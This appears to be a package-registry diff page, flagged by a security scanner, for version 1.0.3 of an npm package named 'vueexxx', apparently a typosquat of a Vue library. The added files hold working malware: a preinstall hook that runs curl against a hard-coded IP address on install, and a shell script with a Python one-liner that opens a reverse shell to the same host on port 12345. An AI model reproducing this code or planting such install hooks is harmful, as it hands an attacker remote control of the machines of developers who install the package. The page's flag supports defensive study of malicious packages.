vueexxx 1.0.3

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of vueexxx might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/bin/init.sh +1 -0
  2. package/package.json +15 -0
package/bin/init.sh ADDED
@@ -0,0 +1 @@
1
+ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.243.78.201",12345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
package/package.json ADDED
@@ -0,0 +1,15 @@
1
+ {
2
+ "name": "vueexxx",
3
+ "version": "1.0.3",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "curl 47.243.78.201:12345 &"
8
+ },
9
+ "author": "",
10
+ "license": "ISC",
11
+ "dependencies": {
12
+ "child_process": "^1.0.2",
13
+ "shelljs": "^0.8.5"
14
+ }
15
+ }